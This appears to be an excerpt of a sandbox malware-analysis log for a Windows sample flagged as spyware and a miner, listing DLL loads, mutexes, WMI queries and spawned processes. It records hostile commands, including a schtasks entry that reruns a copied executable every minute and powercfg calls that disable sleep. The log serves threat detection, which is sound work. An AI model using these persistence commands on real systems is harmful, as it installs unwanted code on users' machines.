              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: dlnashext.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: wpdshext.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
               Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
               Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll
               Source: C:\Windows\explorer.exe Section loaded: userenv.dll
               Source: C:\Windows\explorer.exe Section loaded: cryptbase.dll
               Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll
               Source: C:\Windows\explorer.exe Section loaded: rsaenh.dll
               Source: C:\Windows\explorer.exe Section loaded: sspicli.dll
               Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
               Source: C:\Windows\explorer.exe Section loaded: umpdc.dll
               Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll
               Source: C:\Windows\explorer.exe Section loaded: mswsock.dll
               Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc6.dll
               Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc.dll
               Source: C:\Windows\explorer.exe Section loaded: dnsapi.dll
               Source: C:\Windows\explorer.exe Section loaded: napinsp.dll
               Source: C:\Windows\explorer.exe Section loaded: pnrpnsp.dll
               Source: C:\Windows\explorer.exe Section loaded: wshbth.dll
               Source: C:\Windows\explorer.exe Section loaded: nlaapi.dll
               Source: C:\Windows\explorer.exe Section loaded: winrnr.dll
               Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
               Source: C:\Windows\explorer.exe Section loaded: rasadhlp.dll
               Source: C:\Windows\explorer.exe Section loaded: fwpuclnt.dll
               Source: C:\Windows\explorer.exe Section loaded: wbemcomn.dll
               Source: C:\Windows\explorer.exe Section loaded: amsi.dll
               Source: C:\Windows\explorer.exe Section loaded: profapi.dll
               Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
               Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
               Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
               Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: mscoree.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: apphelp.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: kernel.appcore.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: version.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: vcruntime140_clr0400.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: ucrtbase_clr0400.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: uxtheme.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: windows.storage.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: wldp.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: propsys.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: dlnashext.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: wpdshext.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: profapi.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: edputil.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: urlmon.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: iertutil.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: srvcli.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: netutils.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: windows.staterepositoryps.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: sspicli.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: wintypes.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: appresolver.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: bcp47langs.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: slc.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: userenv.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: sppc.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: onecorecommonproxystub.dll
               Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe Section loaded: onecoreuapcommonproxystub.dll
               Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
               Source: C:\Windows\System32\svchost.exe Section loaded: capabilityaccessmanager.dll
               Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
               Source: C:\Windows\System32\svchost.exe Section loaded: capabilityaccessmanagerclient.dll
               Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
               Source: C:\Windows\System32\svchost.exe Section loaded: windows.staterepositoryps.dll
               Source: C:\Windows\System32\svchost.exe Section loaded: capauthz.dll
               Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
               Source: C:\Windows\System32\svchost.exe Section loaded: wifidatacapabilityhandler.dll
               Source: C:\Windows\System32\svchost.exe Section loaded: wwapi.dll
               Source: C:\Windows\System32\svchost.exe Section loaded: cellulardatacapabilityhandler.dll
              Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@117/4@2/3
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeFile created: C:\Users\user\AppData\Roaming\fgfdgdJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6268:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6648:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6560:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:692:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:904:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3252:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6480:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6320:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4124:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6588:120:WilError_03
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6684:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6316:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3232:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5888:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5424:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:488:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7092:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6624:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6680:120:WilError_03
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeFile created: C:\Users\user\AppData\Local\Temp\ghghghg.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\explorer.exe
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\explorer.exeJump to behavior
              Source: ft1i6jvAdD.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Windows\explorer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" (this identical query is listed 128 times in the report)
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exe | File read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: ft1i6jvAdD.exe | ReversingLabs: Detection: 55%
              Source: unknown | Process created: C:\Users\user\Desktop\ft1i6jvAdD.exe C:\Users\user\Desktop\ft1i6jvAdD.exe
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exe | Process created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe"
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exe | Process created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exe | Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exe | Process created: C:\Windows\System32\cmd.exe cmd" /c copy "C:\Users\user\Desktop\ft1i6jvAdD.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\explorer.exe explorer.exe
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: unknown | Process created: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Process created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe"
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Process created: C:\Windows\System32\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknown | Process created: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Process created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe"
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Process created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe | Process created: C:\Windows\System32\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
              Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe"
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe"
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe" Jump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgdJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /fJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c copy "C:\Users\user\Desktop\ft1i6jvAdD.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /fJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgdJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /fJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe" Jump to behavior
